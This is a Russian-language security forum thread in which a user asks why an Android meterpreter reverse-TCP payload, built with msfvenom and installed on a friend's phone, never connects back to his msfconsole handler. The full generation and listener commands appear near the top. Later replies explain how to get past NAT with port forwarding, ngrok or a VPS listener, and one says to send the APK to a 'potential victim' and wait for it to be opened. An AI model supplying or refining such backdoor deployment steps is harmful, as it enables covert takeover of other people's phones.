• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Проблема Не подключается пэйлоад

D

DoomGuyB

Здравствуйте, вообщем проблема такая, создал я значит через Termux пэйлоад по такой схеме
Код:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.102 LPORT=4444 R > Payload.apk
Попросил подругу помочь с тестом, установила она его на телефон и запустила, я попытался подключиться
Код:
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.2.102
set LPORT 4444
И всё... 10 минут ждал подключение и нечего не произошло, подруга запускала повторно но результата всё нет, и нет.
Может кто-то что-то подскажит?
 

Вложения

  • Screenshot_2018-08-15-09-00-03.png
    Screenshot_2018-08-15-09-00-03.png
    81,4 КБ · Просмотры: 223
  • Нравится
Реакции: AlexF

Letun

Green Team
08.02.2018
50
30
BIT
0
на новых версиях андроида не работает, пробуй на 4-5
 

N1GGA

Codeby Team
Platinum
16.07.2018
326
331
BIT
184
Подскажем. Две возможные причины.
1. У тебя в сети закрыт порт для входящих подключений. Если у тебя маршрутизатор(роутер), ищи как открыть порт в роутере. Если и это не помогло, гугли "Обход NAT".
2. У твоей подружки на ведроиде стоить антивирь, который заблочил твой бекдор.
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
Да какой NAT, если 192.168.2.102 ))) , я так предпологаю, тестирует в своей внутренней сети. Какая у вас версия андройда?
 
  • Нравится
Реакции: CHEATER и Underwood
D

DoomGuyB

Подскажем. Две возможные причины.
1. У тебя в сети закрыт порт для входящих подключений. Если у тебя маршрутизатор(роутер), ищи как открыть порт в роутере. Если и это не помогло, гугли "Обход NAT".
2. У твоей подружки на ведроиде стоить антивирь, который заблочил твой бекдор.

Маловероятно, у неё нет антивируса) и Гугл защита отключена
 

Tayrus

Red Team
13.04.2017
365
787
BIT
6
Вас не смущают предупреждения при запуске метасплоита?
2018-08-15_12-50-23.png
 
O

OneDollar

Твоя " подруга" в локальной сети??? Если нет, проброс портов делай. В роутере переадресацию поищи...
 

Tayrus

Red Team
13.04.2017
365
787
BIT
6
Тогда могу предположить что вы под натом
Вот диапазоны :

10. 0. 0. 0 - 10. 255.255.255
172. 16. 0. 0 - 172. 31.255.255
192.168. 0. 0 - 192.168.255.255 # У вас 192.168.2.102

Вы можете воспользоваться ngrok, чтобы решить эту проблему: Обходим NAT
Или порт открыть.
 
  • Нравится
Реакции: AlexF и Sphinx

Tayrus

Red Team
13.04.2017
365
787
BIT
6
Если имеется ввиду открытие портов у меня на роутере - уже сделано, сейчас снова буду тестить
если у подруги - сама она это хрен сделает)0))
Это все у вас делать надо либо ngrok либо порты откройте либо другой какой-нибудь вариант.
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
Подруга находится в другом сегменте сети,)) я вижу настройки для внутреннего сегмента сети.. что бы вам граммотно подсказать, вы можете описать топологию сети подруги и вашей?. Если она с внешней сети, то у вас неправильно скомпонована полезная нагрузка, а именно ее ip.
 
Последнее редактирование:
D

DoomGuyB

Подруга находится в другом сегменте сети,)) я вижу настройки для внутреннего сегмента сети.. что бы вам граммотно подсказать, вы можете описать топологию сети подруги и вашей?. Если она с внешней сети, то у вас неправильно скомпонована полезная нагрузка.
Можешь подсказать как её скомпоновать правильно?
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
Все очень просто, если подруга во внешнем сегменте сети, то указываете ip в полезной нагрузке внешнее..правда ip должен у вас быть белый и в идеале статическим, если динамический ip , то используете NO-ip или ngrok.А лучше поднимите на vps листенер..тогда в apk указываете IP vps.
 
  • Нравится
Реакции: Sphinx
D

DoomGuyB

Все очень просто, если подруга во внешнем сегменте сети, то указываете ip в полезной нагрузке внешнее..правда ip должен у вас быть белый и в идеале статическим, если динамический ip , то используете NO-ip или ngrok.А лучше поднимите на vps листенер..тогда в apk указываете IP vps.
Спасибо, уже разбираюсь с ngrok.
 
U

user345

у меня такая-же проблема
как сделать это в локальной сети?
т.е мы подключены к одному вифи
пошагово
как исправить данную проблему?
 
S

Sphinx

у меня такая-же проблема
как сделать это в локальной сети?
т.е мы подключены к одному вифи
пошагово
как исправить данную проблему?
В принципе, в локальной сети не должно возникать никаких сложностей.
Необходимо указать IPv4-адрес (192.168.x.x) именно локальной сети при создании полезной нагрузки, а также как параметр LHOST в msfconsole.
Далее, всё проще: отправить потенциальной жертве сгенерированный payload.apk и ожидать установки, и, собственно, открытия приложения.
Если сессия не подаёт признаков жизни, значит на смартфоне установлена антивирусная защита. Данная защита — не обязательно стороннее ПО. Защита может поставляться в комплекте с операционной системой (обычно Android 5.0+).
 

kot-gor

Grey Team
07.09.2016
529
705
BIT
0
Для локальной сети(когда все находятся в одном сегменте сети, всё должно работать.)
 
  • Нравится
Реакции: Sphinx
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!